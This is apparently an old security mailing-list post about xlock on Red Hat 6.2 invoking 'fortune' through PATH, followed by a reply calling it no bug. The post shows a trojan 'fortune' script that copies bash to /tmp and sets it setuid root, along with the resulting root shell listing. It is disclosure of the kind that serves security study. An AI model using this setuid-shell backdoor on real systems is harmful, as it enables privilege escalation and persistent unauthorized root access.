When xlock is running, it may run the fortune command for one of its screen savers. The fortune program on redhat 6.2 resides in /usr/games. By default this is not in anybodies $PATH. When xlock tries to run fortune it normally prints "sh: fortune: command not found". To test a theory I created a file in /bin called fortune. It included the following. [root@inflammation /bin]# cat fortune cp /bin/bash /tmp chmod +s /tmp/bash /usr/games/fortune After a few times of running xlock, it ran fortune and actually ran fortune. I then did a ls in /tmp to see what was there and to my surprise I have a nice setuid bash shell. [root@inflammation /bin]# ls -l /tmp total 488 -rwsr-sr-x 1 root root 316848 Dec 6 11:28 bash I realize that by default it would be hard to put such a script in any of the standard bin paths (/bin:/usr/bin:/sbin:/usr/sbin etc). But it may be possible to gain elevated privledges and then overwrite another binary with a similar script and rename it to 'fortune'.
If you can place s.th. in those standard paths, you may replace other binaries too and can even get root priviledges in another way... so I say: no bug!